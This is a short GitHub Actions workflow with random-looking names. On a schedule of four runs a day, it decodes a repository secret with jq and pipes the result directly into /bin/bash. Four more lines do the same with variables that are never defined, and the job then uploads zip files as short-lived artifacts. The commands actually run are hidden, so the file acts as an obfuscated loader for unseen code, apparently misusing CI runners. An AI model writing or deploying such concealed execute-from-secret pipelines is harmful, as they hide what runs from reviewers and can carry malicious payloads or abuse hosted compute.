name: jinwenjianxiao
on:
  workflow_dispatch:

  schedule:
    - cron: '6 5,11,17,23 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jinwenjianxiao
        env:
          lg6: ${{ secrets.lg6 }}
        run: |
          printf '%s' "$lg6" | jq -r .cjz47 | /bin/bash
          echo $bhs7425 | jq -r .nkne1179 | /bin/bash
          printf '%s' "$zbum5" | jq -r .h468 | /bin/bash
          echo $bu08 | jq -r .oyb50 | /bin/bash
          echo $xrqk7748 | jq -r .pee46756 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: HrWprgTV
          path: "*.zip"
          retention-days: 1
